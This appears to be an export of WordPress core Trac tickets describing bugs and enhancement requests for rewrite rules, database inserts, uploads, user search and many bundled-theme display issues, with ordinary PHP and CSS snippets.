Rewrite Rules 4.9 normal normal Awaiting Review defect (bug) new needs-unit-tests 2017-09-04T11:15:57Z 2017-09-15T13:14:58Z "This was reported here https://github.com/woocommerce/woocommerce/issues/16673 To recreate the issue, create a taxonomy with a cyrillic name such as Сертификат. View the taxonomy archive. You'll see no results; it will go to the homepage rather than an archive. In WooCommerce you can recreate this by creating an attribute (Product > Attributes) with a cyrillic name, and enabling the 'archive', assigning a term from this taxonomy to a product, and trying to view products by that term. I managed to trace it back to the `add_permastruct`. The `struct` is added with unicode % encoded characters. When the rewrite rules are processed, it thinks these are placeholders so the `matches` variables do not align. See this screenshot for clarity: https://www.dropbox.com/s/5vztnfm6895488a/query%20is%20wrong.png?dl=0 Notice all the $matches? Compare to a working taxonomy: https://www.dropbox.com/s/24zyr5v7taw7b60/correct.png?dl=0 This can be fixed by using `urldecode` when adding the permastruct. I don't know if this has side effects but it worked in testing. Patch to follow. " mikejolley Future Releases 43578 Unexpected MYSQL data format Database 4.9.4 normal normal Future Release defect (bug) new dev-feedback 2018-03-19T19:36:00Z 2020-02-03T18:01:45Z "When I use field `user_id` in `$wpdb->insert` it set value to Integer, but the table I add data into has `user_id` text field. It works normally only if `format` parameter specified. Example: {{{#!php <?php $wpdb->query(""CREATE TABLE {$wpdb->prefix}_test (`id` INT, `user_id` VARCHAR(16))""); $wpdb->insert(""{$wpdb->prefix}_test"", ['id' => 1, 'user_id' => 'stringKey']); print_r($wpdb->get_row(""SELECT * FROM {$wpdb->prefix}_test WHERE id = 1"")); }}} Result: `stdClass Object ( [id] => 1 [user_id] => 0 )`" loranrendel Future Releases 54078 Underscore appended to media file on upload Upload 5.8 normal normal Awaiting Review defect (bug) new dev-feedback 2021-09-06T14:02:07Z 2021-09-07T14:35:04Z "I noticed that a random underscore is appended to media files, when uploading them in an article. Im using the Classic Editor. The original file name was: **AB-LET.2018.133.AXH1.jpg** Once uploaded, it became: **AB-LET.2018.133.AXH1_.jpg** There was no prior file uploaded with that name (at least the media gallery does not find any)." spielautomat4 Future Releases 47733 Undefined index HTTP_HOST in wp-includes/ms-settings.php on line 57 SergeyBiryukov Bootstrap/Load 5.2.2 normal minor Future Release defect (bug) reviewing dev-feedback 2019-07-18T17:10:16Z 2024-02-21T14:31:47Z "We get requests on our server of the form {{{ 175.143.12.??? - - [30/Jun/2019:10:22:45 +0200] ""GET / HTTP/1.0"" 500 73873 ""-"" ""-"" (dinse.eu) }}} This request uses HTTP/1.0 and results in a status code 500. The related entry in the PHP error log is {{{ [30-Jun-2019 08:22:45 UTC] PHP Notice: Undefined index: HTTP_HOST in /usr/www/xxxx/wp-includes/ms-settings.php on line 57 }}} 1. In ms-settings.php on line 57 it is not checked if {{{ $_SERVER['HTTP_HOST'] }}} is set. 2. Also I've found that in the case of this specific request {{{ $_SERVER['SERVER_NAME'] }}} is defined and not empty and can be used as a replacement. My suggestion is to first check if {{{ $_SERVER['HTTP_HOST'] }}} is set else check if {{{ $_SERVER['SERVER_NAME'] }}} is set and if both are not set to implement a graceful error handling. This may be related to #34353. WP 5.2.2 PHP 5.6.40 Server: Apache/2.4.25 (Debian) WP_DEBUG = true " JochenT Future Releases 55548 "Unchecked ""Uncategorized"" checkbox re-checks itself upon publish or update of a post" Editor 5.9.3 normal normal Awaiting Review defect (bug) new dev-feedback 2022-04-08T21:02:10Z 2022-04-08T21:02:10Z "A WordPress-based news website's editorial team has problems with the ""Uncategorized"" category. 1. They create a post and check the desired category and uncheck the default ""Uncategorized"" category. 2. Then they click ""Publish"". 3. At the last second during the Publish operation, the Block Editor unchecks the user-selected category and re-checks ""Uncategorized"". 4. Then they have to go back into the post and attempt to uncheck ""Uncategorized"" and recheck the desired category. They have to do step 4 three or four times to get the result they want. Or they just use ""Quick Edit"" to change it in the post list. It doesn't happen every time and is sometimes difficult to reproduce. But it happens often enough to be a problem. I cannot find a way to consistently reproduce it. Nor can I find any indication that this is a known issue with WordPress. It will happen with or without plugins enabled. If there's no easy way to investigate or fix this in core, is there a way to add a script somewhere in the theme's functions.php or a jQuery script somewhere to ensure that ""Uncategorized"" *never* gets checked and that the originally-intended category remains checked? All the searches I do on Google for this topic ironically just reveal a bunch of posts on peoples' blogs that are set to ""Uncategorized""." rcwatson Future Releases 45725 Unable to use the UPLOADS constant with WordPress in a different directory Upload normal normal Awaiting Review enhancement new needs-docs 2018-12-20T13:07:46Z 2019-01-16T06:50:09Z "=== The problem === When WordPress is installed in a different directory (you can achieve that by following [[https://codex.wordpress.org/Giving_WordPress_Its_Own_Directory|these instructions]]), the **UPLOADS** constant is unable to function correctly in some cases according to the **wp_upload_dir()**'s output. Occasionally the constant accepts a relative path what will be appended to the **ABSPATH** constant to determine the **basedir** and to the **site_url()** function to determine the **baseurl** for the uploads location. Although WordPress does let you move the CMS (it actually can be anywhere on the filesystem), however the uploads directory will always be relative to the CMS directory (**ABSPATH** constant) when using the **UPLOADS** constant. === The use case === There are multiple use cases which will be affected by this but let's consider the next few parameters: * Website URL: example.com * Website DIR: /foo/bar * WordPress URL: example.com/wordpress * WordPress DIR: /foo/bar/wordpress Our goal is to store uploads at: * Uploads URL: example.com/uploads * Uploads DIR: /foo/bar/uploads However when we defining the UPLOADS constant as 'uploads', will result in the following: * Uploads URL: example.com/wordpress/uploads * Uploads DIR: /foo/bar/wordpress/uploads You might wonder what will happen when we use an absolute value for the constant instead, in this case '/foo/bar/uploads' is used: * Uploads URL: example.com/wordpress//foo/bar/uploads * Uploads DIR: /foo/bar/wordpress//foo/bar/uploads === The solution === Possible solutions where I could came up with are, the two following: * Add another constant like **ABSPATH** to the index.php, this could be tricky for some people to update but the benefits of it are very useful. It will allow you to use one WordPress installation for all your WordPress websites. How you might wonder? [[https://stackoverflow.com/a/39195424/3157038|This is how]], I've been using this already for years! * Another solution could be to introduce a new constant specifically for the uploads directory path and only use the current **UPLOADS** constant for the url. Both of these solutions require to be implemented into the **_wp_upload_dir()** function [[https://core.trac.wordpress.org/browser/tags/5.0/src/wp-includes/functions.php#L1972|on line 1972 in wp-includes/functions.php]] Have a look at the patch attached to this ticket, with the patch WordPress will introduce both the **UPLOADS_DIR** and **INDEX_ABSPATH** constant. According to some tests I did it should also be backward compatible." Fleuv Future Releases 44358 Unable to search a user if username is an email address Users normal normal Awaiting Review enhancement new dev-feedback 2018-06-13T14:43:41Z 2019-01-16T06:50:09Z "If a user has an email address in his username, that user is not searched in admin user list page. Steps to reproduce: - Create a new user and use an email address as the username, e.g. `abc@gmail.com` - Make sure no user on the system has an email address which contains `abc@` in it - Search a user with `abc@` keyword. No user will be returned. I think since WordPress does not restrict the character `@` in username, the search should include username field even when there is `@` in search keyword. Does this make any sense? " subrataemfluence Future Releases 31615 UI bug using Quick Edit Quick/Bulk Edit 4.1.1 normal normal defect (bug) new dev-feedback 2015-03-12T20:13:47Z 2019-06-04T21:14:25Z "After changing the parent attribute for a page using Quick Edit, the page title is prepended with the child hyphen but the table structure does not change. Refreshing the page fixes the issue. Using latest 4.1.1 with no plugins installed and default theme. '''Steps to replicate:''' 1. Change the parent of a page or post using quick edit '''Browser''' Chrome: 41.0.2272.76 (64-bit) OS X Yosemite 10.10.2. " justingreerbbi Future Releases 60070 Typo in wp-includes/class-json.php General normal trivial Awaiting Review defect (bug) new dev-feedback 2023-12-14T10:25:56Z 2024-01-27T21:12:45Z "If we go through wp-includes/class-json.php on line number 186 we can see it is mentioned: ""multibye"". It should be ""multibyte""." jayadevankbh Future Releases 37882 Typo in the tests/qunit/wp-admin/js/customize-header.js Customize 3.9 normal normal Future Release defect (bug) new dev-feedback 2016-08-30T13:56:49Z 2019-04-18T19:02:19Z Fix test header in the 'Custom Header: HeaderImage shouldBeCropped()' module tymvie Future Releases 58986 TypeError: Unsupported operand types: string * int * Date/Time 6.2.2 normal normal Future Release defect (bug) reopened dev-feedback 2023-08-05T17:08:48Z 2024-03-18T17:57:31Z "Path: `/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php` File: `class-wp-rest-posts-controller.php` Line: 1833 **Expression Error:** `get_option('gmt_offset') * HOUR_IN_SECONDS` **Rais Exception:** `TypeError: Unsupported operand types: string * int` Suggested Fix: `intval(get_option('gmt_offset')) * HOUR_IN_SECONDS` Thanks " nurielmeni Future Releases 60669 Twenty-Twenty-Two: The search block does not look the same same in the editor and the front. Bundled Theme 6.4.3 normal normal Awaiting Review defect (bug) new dev-feedback 2024-03-01T10:34:22Z 2024-03-01T15:42:09Z "Hello, I have reviewed and found that the ""Search Block"" border does not appear in front end. Here, I have attached its screenshots. Environment info Device: Macbook M1 OS: 14.3.1 (23D60) Browser: Google Chrome Version 121.0.6167.184 (Official Build) (arm64) WordPress version: 6.5-beta2 running, Gutenberg 17.8.0, Theme active: Twenty-Twenty-Two. Thanks," viralsampat Future Releases 55815 Twenty-Twenty-Two: Post Format Gallery Bundled Theme normal normal Awaiting Review defect (bug) new dev-feedback 2022-05-25T06:01:35Z 2022-06-17T18:52:44Z "Twenty-Twenty-Two does not include gallery columns classes for the frontend. Another default theme has this class and it working fine for them. {{{ .gallery-columns-2 .gallery-item { max-width: 50%; } .gallery-columns-3 .gallery-item { max-width: 33.33%; } .gallery-columns-4 .gallery-item { max-width: 25%; } .gallery-columns-5 .gallery-item { max-width: 20%; } .gallery-columns-6 .gallery-item { max-width: 16.66%; } .gallery-columns-7 .gallery-item { max-width: 14.28%; } .gallery-columns-8 .gallery-item { max-width: 12.5%; } .gallery-columns-9 .gallery-item { max-width: 11.11%; } }}} " mukesh27 Future Releases 49030 Twenty Twenty: video resize functionality also impacts other elements on the page Bundled Theme 5.3 normal normal Awaiting Review defect (bug) new dev-feedback 2019-12-18T17:34:13Z 2020-05-14T15:37:38Z "Twenty Twenty bundles a functionality named ""Intrinsic Ratio Embeds"", allowing videos ({{{iframe}}}, {{{object}}}, {{{video}}}) to be automatically resized on demand. This is practical, but can be problematic for some elements on the page that may not behave like a video, or that may not be in the post content at all. While plugins can use the {{{.intrinsic-ignore}}} CSS class to avoid being impacted by this, I wonder if we could be a bit more specific within the theme, and only target videos inside the post content. This would avoid conflicting with plugins adding iFrames and / or videos outside of the post content, like in widgets. " jeherve Future Releases 57978 Twenty Twenty: Separator block does not work well with gradients Bundled Theme normal normal Awaiting Review enhancement new dev-feedback 2023-03-24T10:31:49Z 2023-06-10T06:53:38Z "Steps to reproduce the issue :- 1. Download WordPress version beta version. 2. Choose Twenty Twenty theme. 3. Choose separator block. 4. Apply background color to separator block. 5. Now you can able to see that background color overlaps. Because of that design not looks as per requirements. I have attached video for better understanding. Video URL :- WordPress version beta version. https://share.cleanshot.com/Y9t7PKCBmJSB8dBW1hH4" nidhidhandhukiya Future Releases 59706 Twenty Twenty: Latest Posts block colors and padding Bundled Theme 6.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-10-23T11:59:17Z 2023-10-25T22:19:11Z "Hello Team, I have worked on the **""Twenty Twenty""** theme and found that the ""Twenty Twenty"" theme contains an issue for the **""Latest Post""** block. The text color does not change when we try to select text color from block settings. Also, When we select the background color, the padding is added in admin, But in the front end, the post text displays a sticky, The padding is not added for the front end. Here, I have provided the issue video: Issue: [https://share.cleanshot.com/5mkR0sVQ25VYM6xp434Y] Thanks," viralsampat Future Releases 50418 Twenty Twenty: Inline Images displaying as block Bundled Theme 5.4.2 normal normal Future Release defect (bug) new dev-feedback 2020-06-17T23:51:12Z 2023-06-06T22:43:17Z "Inline images (those added inside a paragraph block) will display on top of each other (as blocks) instead of next to each other (inline or inline-block). https://d.pr/i/13DtBl This will not happen in the editor, only on the public page/post: https://d.pr/i/vkV9vC I tried to reproduce this with several themes such as Rockwell, Brandsbury and Coutoire, but they all seem to work fine." mrfoxtalbot Future Releases 50026 Twenty Twenty: Full height with short content Bundled Theme normal trivial Awaiting Review enhancement new dev-feedback 2020-04-28T22:35:16Z 2023-06-21T23:01:09Z "With the `twentytwenty` theme, when the height of the content in a page does not fill up the entire viewport, the page ends up with extra trailing whitespace. If we treat the `<body>` as a flex box the page will always be filled: {{{ body { display: flex; flex-direction: column; min-height: 100vh; } main#site-content { flex: 1 } }}} " beaucollins Future Releases 48779 Twenty Twenty: Copyright and WordPress as text widget Bundled Theme 5.3 normal normal Awaiting Review feature request new dev-feedback 2019-11-24T11:46:32Z 2022-07-08T16:08:09Z "I would request to have all content elements easily editable. The only elements I couldn't change from the wp-admin interface were the footer copyright and wordpress text. I would like to change the Copyright to make it linkable and add creative commons to it. Now I had to do it a technical way by child theming, but not everyone is that technical. Custom HTML (copyright) & Text widgets (wordpress link) with a third footer or so could be a solution? Only disadvantage is that WordPress doesn't support PHP by default for security reasons so you can't add the actual site name by code. But a lot of sites doesn't use their company name as site name so it can also be some lorum ipsum text. e.g. © <script>document.write(new Date().getFullYear())</script> My Company " jurjendevries Future Releases 48800 Twenty Twenty: Conditional loading of language/locale specific css and php files Bundled Theme 5.3 normal normal Awaiting Review feature request new dev-feedback 2019-11-26T20:52:30Z 2019-11-26T22:01:42Z "First reported on GitHub by @nukaga https://github.com/WordPress/twentytwenty/issues/970 In the current site design, the title is too large in Japanese and Chinese. The center alignment is also extraordinary. https://github.com/WordPress/twentytwenty/issues/118#issuecomment-541292567 https://github.com/WordPress/twentytwenty/issues/118#issuecomment-538964579 Solution Is it possible to separate the title and body CSS in several languages?" ianbelanger Future Releases 56205 Twenty Twenty: background color of column can affect the inner content color Bundled Theme 6.0 low normal Awaiting Review enhancement new close 2022-07-12T13:52:54Z 2022-07-15T09:45:19Z "Steps to reproduce :- 1. Activate Twenty Twenty theme. 2. Choose Columns block. 3. Give background-colour Accent colour from the options. 4. In inner column give a white background. all the text under that column block is not visible because it is by default taking white colour. For better understanding please refer to this video. Video URL:- [https://share.cleanshot.com/vskbRyILtP0XkAq8aid4]" nidhidhandhukiya Future Releases 48804 Twenty Twenty: Attach template parts with actions instead of directly including Bundled Theme 5.3 normal normal Awaiting Review enhancement new dev-feedback 2019-11-26T21:42:41Z 2019-11-26T21:54:34Z "Originally requested on GitHub by @thomasplevy https://github.com/WordPress/twentytwenty/issues/947 **The Problem** Not all custom post types are created equal. Some custom post types are like blog posts where meta information, post author information, and navigation between post types makes sense. Other custom post types behave more like native pages where navigation between pages is undesirable. This is a pretty generic and blanket statement and it's not always true. Custom post types are custom and the requirement differ greatly depending on the developer creating them. I am working to add Twenty Twenty theme support for my plugin [LifterLMS](https://github.com/gocodebox/lifterlms) and I have several custom post types which I'd like to be able to remove author and custom post type navigation for. Given the fact that custom post types utilize template at `template-parts/content.php` it is currently only possible for me to remove the navigation and author information by using custom CSS. The meta information I am able to disable using the filter `twentytwenty_disallowed_post_types_for_meta_output`. **Proposed Solution** I'd like to modify the template in question to either be wrapped in a filter which allow the inclusion of `template-parts/entry-author-bio.php` and `template-parts/navigation.php` to be disabled via a filter. For example: https://github.com/WordPress/twentytwenty/blob/dea9290e7ca3d38b7067c3b7107787db6554249a/template-parts/content.php#L68-L72 {{{ if ( is_single() ) { get_template_part( 'template-parts/navigation' ); } }}} Could become: {{{ if ( is_single() && apply_filters( 'twentytwenty_display_single_navigation', true ) ) { get_template_part( 'template-parts/navigation' ); } }}} If this does seem like an acceptable addition I'd be more than happy to write and submit the PR but I didn't want to spend time without a blessing from a core contrib or maintainer first. Thank you for considering this!" ianbelanger Future Releases 56496 Twenty Twenty-Two: Update comment block markup Bundled Theme normal normal Future Release defect (bug) new dev-feedback 2022-09-02T09:37:52Z 2024-01-19T11:13:34Z "The comment block markup in Twenty Twenty-Two is using an outdated version of the block: `<!-- wp:post-comments /-->` In the Site Editor, the block shows the following notice: You're currently using this block in legacy mode. This should be updated to use the latest version of the comments block, e.g. wrapped in the `<!-- wp:comments -->` tag." mikachan Future Releases 58107 Twenty Twenty-Two :- PullQuote block Letter case is not working in citation text Bundled Theme 6.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-04-09T16:40:12Z 2024-01-28T23:38:22Z "**Steps to reproduce the issue : ** - Activate Twenty Twenty-Two theme. - Go to Posts / Pages > Add New Post / Page - Choose Pullquote block. - Add some text in Quote & citation. - Apply Letter Case in Pullquote You can able to see that Letter Case is not working in the citation text. I have attached video for better understanding. **Video URL** :- https://drive.google.com/file/d/1-ypweKmaHmNCmq38naNi5TV0LEldojCQ/view" shailu25 Future Releases 56949 Twenty Twenty-Three: Screenshot of the new default theme Bundled Theme 6.1 normal normal Awaiting Review defect (bug) new dev-feedback 2022-11-02T04:02:28Z 2023-03-20T16:54:17Z "The screenshot of the new default theme TT3 is showing the backend editor, not the front view of it. Our theme guideline is, * The screenshot must not look like an advertisement. The reviewer can subjectively ask you to change screenshots if they find that it is not appropriate. https://make.wordpress.org/themes/handbook/review/required/ It seems that showing Global Styles in the screenshot is like an advertisement of the feature. I'm wondering if other themes can also update the screenshot showing Global Styles or Editor. " kafleg Future Releases 57167 Twenty Twenty-Three: Replace base and contrast color names with ref values Bundled Theme normal normal Awaiting Review enhancement new dev-feedback 2022-11-21T18:20:55Z 2022-12-07T15:26:33Z "There have been previous discussions around the use of ""base"" and ""contrast"" as color names in the Twenty Twenty-Three color palette, here: https://github.com/WordPress/twentytwentythree/issues/36 I'd like to propose another idea that may help solve the naming issues, especially around these two colors. We could define these two colors in `styles.color.background` and `styles.color.text` instead of defining them separately in the color palette. We could then use `ref` values to reference them elsewhere in the theme.json files. The colors can still be defined in the color palette, but perhaps under a descriptive name, e.g. ""dark purple"". This means that the names of these two colors in the color palette would not need to match their purpose (e.g. background, foreground, base, contrast). I've created a PR to demonstrate the idea." mikachan Future Releases 57024 Twenty Twenty-Three: Randomly apply a style variation on activation Bundled Theme 6.1 normal normal Awaiting Review enhancement new dev-feedback 2022-11-07T19:28:49Z 2022-11-17T19:20:23Z "In addition to the default base styling, Twenty Twenty-Three comes with 10 additional style variations. When activating for the first time, an interesting way to showcase what the theme has to offer would be to randomly apply one of the 11 style variations." desrosj Future Releases 60778 Twenty Twenty-Three Theme: The Quote block style is not working as expected. Bundled Theme normal normal Awaiting Review defect (bug) new dev-feedback 2024-03-15T07:13:01Z 2024-03-15T10:06:33Z "Hello, I have reviewed and found that the ""**Quote**"" block style is not working as expected into the **Twenty Twenty-Three** theme. Here, I have attached video: Issue: [https://share.cleanshot.com/78X9q3xkwy0kkT5HvHFL] Thanks," viralsampat Future Releases 54368 Twenty Twenty-One: Visibility issue on Input field of search widget in dark mode Bundled Theme normal normal Future Release defect (bug) new dev-feedback 2021-11-03T12:50:08Z 2023-03-25T17:44:38Z When the dark mode is on, the search input field is not that visible on the twenty twenty-one theme. https://imgur.com/a/bEEjM09 amin7 Future Releases 54173 Twenty Twenty-One: Social icons Bundled Theme normal normal Awaiting Review feature request new dev-feedback 2021-09-23T19:34:24Z 2021-10-05T16:44:29Z "twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php in that beautiful theme mail is take into account and and mailto: links are shown with an envelope icon shouldn't be the same with a tel: link ? (a phone icon) IMHO yes" marco.milone Future Releases 56748 Twenty Twenty-One: Image stuck to text in responsive sizes Bundled Theme 5.6 normal normal Future Release defect (bug) assigned dev-feedback 2022-10-06T14:54:03Z 2023-03-25T15:21:22Z "In responsive after 481px screen size image got stuck to text. https://share.cleanshot.com/Ewl5TgZMdla8HDxLeERf" sagarladani Future Releases 52683 "Twenty Twenty-One: Block ""more"" text in link can't be changed" audrasjb Bundled Theme 5.6.2 normal normal Future Release defect (bug) reviewing dev-feedback 2021-03-01T14:03:56Z 2022-04-12T16:51:13Z "Hi team, Hope you are well. I am on basic theme 5.6.2 Quick TT about the block ""more"" that we can add in article to have the link read more on the home page. When I add this block I can change the text of the link but for some reason it doesn't show up on home page. Doesn't matter what I change I have always ""Poursuivre la lecture de"" as a link on my home page. I am on french version. I didn't find any fix on your doc. Regards" neokendev Future Releases 52185 Twenty Twenty-One: background image does not work with dark mode Bundled Theme 5.6 normal normal Awaiting Review defect (bug) new dev-feedback 2020-12-28T23:29:48Z 2020-12-29T00:58:24Z "I noticed that if I add a background image by going to Appearance > Customize > Background Image > Add image and turn on the dark mode the website changes the text to white but it does not have a dark background. Instead, it shows that background image which is hard to read white text on. I was trying to find a workaround where if it is in dark mode then make the background image either disappear or darken. I do not see anywhere to attach a file so it may not be with this ticket. Michael" WebsThatRock Future Releases 59934 Twenty Twenty-Four: PHPCS: Empty line required before block comment Bundled Theme 6.4 normal normal Awaiting Review enhancement new dev-feedback 2023-11-20T07:56:34Z 2023-11-24T22:42:14Z I have fixed Empty line required before block the comment PHPCS issue on the twenty-twentyfour theme's function file. pratikharadava Future Releases 56601 Twenty Ten: overlap issue in Button block Bundled Theme 6.0.2 normal normal Awaiting Review defect (bug) new close 2022-09-19T12:09:07Z 2023-06-05T04:39:33Z "In Twenty Ten Theme, when we add Button block in editor side and change alignment as ""Align left"" or ""Align right"". After that we add paragraph block or any other block then we can see that the Button block is overlapping with the newly added block. Steps to replicate: 1: Activate the Twenty Ten Theme 2: Add Button block 3: Choose ""Align right"" or ""Align left"" from Align option 4: Add paragraph Block 5: View the page/post at editor side For better understanding I provide video attachment link. Video link: https://share.cleanshot.com/XuFtIRCURbgfcSSNxf41 Thanks" kajalgohel Future Releases 60012 Twenty Sixteen: Pullquote block Appearance setting is not working properly Bundled Theme normal normal Awaiting Review defect (bug) new dev-feedback 2023-12-05T09:37:35Z 2024-01-02T20:32:03Z "The appearance of PullQuote blocks is not working correctly in Twenty-Sixteen. Though there are many options like semi-bold, medium, italic, etc. it seems only two things get applied no matter what I choose. It's either normal, bold or extra bold. And the extra bold is just as same as Black. No changes with any kind of italic. Steps to reproduce the issue:- 1. Activate Twenty Sixteen theme. 1. Choose Pullquote block. 1. Write something in Citation 1. Change the appearance To understand properly, here's the video: https://monosnap.com/file/kMF24nu84Y0Uj17dSOl11XSbNCslpy" ashikur698 Future Releases 60374 Twenty Sixteen: Navigation block inherits colors from button styles Bundled Theme normal normal Awaiting Review defect (bug) new dev-feedback 2024-01-30T08:25:25Z 2024-02-26T20:11:23Z "Similar to https://core.trac.wordpress.org/ticket/59924 The navigation block has an option called ""Open on click"" that is available when there is a submenu. When the option is enabled, the parent menu item is a <button> element. On the front of the website, this button inherits the background styles from the themes button CSS: {{{ button:hover, button:focus, input[type=""button""]:hover, input[type=""button""]:focus, input[type=""reset""]:hover, input[type=""reset""]:focus, input[type=""submit""]:hover, input[type=""submit""]:focus { background: #007acc; } }}} When the menu item is focused, activated or hovered over, the background color changes to blue. == Testing instructions: Activate Twenty Sixteen Make sure that your WordPress installation has some content that you can place in the navigation block, because you will need to create a submenu. Create a new post or page. Add a navigation block. In the block, select the inserter and add a link: this will be your parent menu item. Click on the link and select the option ""Add submenu"". Add a link. Save. Go to the front of the website. Locate the navigation and hover over or move focus to the item that has the submenu. Confirm that the background color of the menu item changes. (You may also notice that if you set a background color on the submenu item in the block settings, this color only works in the editor, not the front, and this is a separate issue.) " poena Future Releases 51858 Twenty Sixteen: Add Telegram and Whatsapp support to Social Media Menu Bundled Theme normal normal Awaiting Review feature request new dev-feedback 2020-11-24T02:29:03Z 2021-10-25T17:50:26Z "This is a follow-up to #43999. Please, add Telegram and Whatsapp support to Social Media Menu on Twenty Sixteen bundled theme. Support for these icons were added to Twenty Seventeen and Twenty Twenty. Can it be added to Twenty Sixteen as well? Thanks!" Valery Kondakoff Future Releases 40292 Twenty Seventeen: Use echo file_get_contents() instead of require_once() to pull in SVG file contents Bundled Theme 4.7.3 normal normal Awaiting Review defect (bug) new dev-feedback 2017-03-29T04:16:12Z 2023-10-06T13:27:34Z "Using require_once() to pull in the contents of SVG files can result in the PHP parser throwing a {{{ PHP Parse error: syntax error, unexpected version (T_STRING) }}} error if any of the SVG files begin with {{{ <?xml version=""1.0"" encoding=""UTF-8""?> }}} The proposed solution is to use echo file_get_contents() instead. A few recommendations for using that method are here: https://css-tricks.com/using-svg/#article-header-id-7 http://sheelahb.com/blog/how-to-get-php-to-play-nicely-with-svg-files/ It could be argued that using require_once() is fine in Twenty Seventeen, since we know that none of the SVGs in /assets/images/svg-icons.svg contain the problematic <?xml … ?> tag. However, there are of course many developers who fork Twenty Seventeen, or copy its code into their own themes, so it seems wise to me to pull in SVG file contents using a method that won't throw errors in the event that <?xml … ?> tags are present in any SVG files." kellenmace Future Releases 42358 Twenty Seventeen: Social Links menu items in footer get hidden when used as child Bundled Theme 4.9 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-27T13:44:04Z 2021-08-21T23:30:57Z "Inside customizer if I reorder Social Menu Items as Children while they are on footer, child items are not visible any more and no way to access them! But they come up as dropdown sub menu item(s) when placed in Top menu. Screenshot attached. I think when Footer menu is checked menu option to create a parent-child kind of ordering should not be available. However, if both options (Header and Footer) are checked, parent-child ordering needs to be there, but it should only in header menu only and leaving all footer menu items visible." subrataemfluence Future Releases 39253 Twenty Seventeen: Head Image Quality Issue Bundled Theme 4.8 normal normal Future Release defect (bug) new dev-feedback 2016-12-12T20:51:19Z 2020-02-24T19:15:48Z "A question about the Twenty Seventeen Theme's Head Image, it is really cool but the image is not in the best position on iOS Safari and image quality drops too... [[Image(https://holywhite.com/wp-content/uploads/2016/12/Evernote-Camera-Roll-00281213-053634.png)]] But if I turn the phone around... [[Image(https://holywhite.com/wp-content/uploads/2016/12/Evernote-Camera-Roll-00281213-053635.png)]] Looking much better, refresh it and rotate again? [[Image(https://holywhite.com/wp-content/uploads/2016/12/Evernote-Camera-Roll-00281213-053636.png)]] Wow the shiny picture comes back... P.S. Is it possible to set the align of Head Image on mobile? So I can choose which part of the picture I mostly wanna show." richardevs Future Releases 60667 Twenty Seventeen: Cover block font-size does not apply to headings Bundled Theme 6.4.3 normal normal Awaiting Review defect (bug) new close 2024-03-01T09:30:26Z 2024-03-02T22:43:44Z "Steps to reproduce the issue :- 1. Activate Twenty Seventeen theme. 2. Choose Cover Block. 3. Add Paragraph and Heading block inside cover block. 4. Now give font-size from cover block settings. You can able to see that whatever font-size is choosen directly from the Cover block that is not applied on Heading block. I have attached video for better understanding. Video URL :- https://share.cleanshot.com/dqrXphrT236ZJ5xP0mFh " nidhidhandhukiya Future Releases 55180 Twenty Seventeen: Comments not showing up on the frontpage Bundled Theme 5.9 normal normal Awaiting Review defect (bug) new dev-feedback 2022-02-16T20:13:32Z 2023-06-07T17:56:39Z "Hi there, I'm not able to find any further information on this, but it looks like the comments aren't showing up on a static homepage with Twenty Seventeen. I have tested this with the latest update of WordPress(5.9) and the last version of the theme. **Steps to reproduce** 1. Switch theme to twenty seventeen 2. Enable ""Allow comments"" within the discussion tab on the sidebar on the homepage. 3. Check the page and search for the comments area. Original request: https://github.com/Automattic/themes/issues/5545 If this is intended, I found this as a potential workaround: https://wordpress.stackexchange.com/questions/268305/display-comments-on-homepage-of-twenty-seventeen-theme" robertghetau Future Releases 58547 Twenty Seventeen: Calendar block header cells should be centered Bundled Theme 6.2.2 normal trivial Awaiting Review defect (bug) new dev-feedback 2023-06-15T17:51:49Z 2023-06-15T19:01:32Z "The th elements in the Calendar block are not centered like the rest of the text in the Calendar which looks odd. " nkeller15 Future Releases 58474 Twenty Seventeen: Box shadow on Site Logo block looks odd Bundled Theme 6.2.2 normal minor Awaiting Review defect (bug) new dev-feedback 2023-06-07T15:26:43Z 2023-06-09T22:08:13Z "Steps to reproduce: 1. Activate the Twenty Seventeen theme 2. Add the Site Logo block to any page or post and add an image 3. Make sure link to home setting is toggled on 4. Save and view on front end " nkeller15 Future Releases 39740 "Twenty Seventeen: Allow child themes to use front-page.php when front page is set to ""Your Latest Posts""" Bundled Theme 4.7 normal normal Awaiting Review defect (bug) reopened dev-feedback 2017-01-30T19:54:05Z 2023-04-18T09:41:50Z "== What's Happening: == If a child theme of Twenty Seventeen has a `front-page.php` file, and the Reading settings are set to have ""Your Latest Posts"" as the front page, Twenty Seventeen's `twentyseventeen_front_page_template()` function, called on the `frontpage_template` filter, sets the template to an empty string instead of the child theme's `front-page.php`, so `index.php` gets used. == What I expect: == I expect the child theme's `front-page.php` to be used if present, no matter what the Reading settings are for the front page, as [https://developer.wordpress.org/themes/basics/template-hierarchy/#front-page-display described in the codex]. This is the default behaviour. == Relevant Code: == Here's TwentySeventeen's `twentyseventeen_front_page_template()` function, for reference: {{{ /** * Use front-page.php when Front page displays is set to a static page. * * @since Twenty Seventeen 1.0 * * @param string $template front-page.php. * * @return string The template to be used: blank if is_home() is true (defaults to index.php), else $template. */ function twentyseventeen_front_page_template( $template ) { return is_home() ? '' : $template; } add_filter( 'frontpage_template', 'twentyseventeen_front_page_template' ); }}} Link to [https://core.trac.wordpress.org/browser/trunk/src/wp-content/themes/twentyseventeen/functions.php?rev=40024#L530 location in code viewer]. " johnnyb Future Releases 39893 Twenty Seventeen Header Media: YouTube Embed Does Not Fill Screen Bundled Theme 4.7.2 normal normal Awaiting Review defect (bug) new dev-feedback 2017-02-16T18:47:31Z 2023-04-17T10:32:24Z "Hi. I was really excited to see 2017 in action and thought a great deal of the video header feature, but my expectations were dashed when I realised that the promise of anamorphic images and videos automatically stretching to full screen in the header just did not materialise, despite using all the precautions, guidelines and recommendations suggested in the theme: 2000x1200 as per image, .mp4, etc. It seems that no matter what video link from YT I tried the image will stretch, but the video will not. Is there a solution to this or is it just me? You can see a brand new installation with no extra plugins, scripts or other potentially interfering code in the way, here: http://2ud.biz/dev/ Thanks in advance " cingrosso Future Releases 49931 Twenty Nineteen: Group color styles prevent custom colors poena Bundled Theme normal normal Future Release defect (bug) assigned dev-feedback 2020-04-17T09:42:10Z 2024-02-13T11:46:31Z "When TwentyNineteen was created, the ability to colorize various blocks was not as full-featured as it is today. You could easily choose text and background colors in a block, that would have no contrast at all. However this is less of an issue today, where the contrast checker will help inform you whether the text is sufficiently legible or not. In addition to this, the rules that colorize text 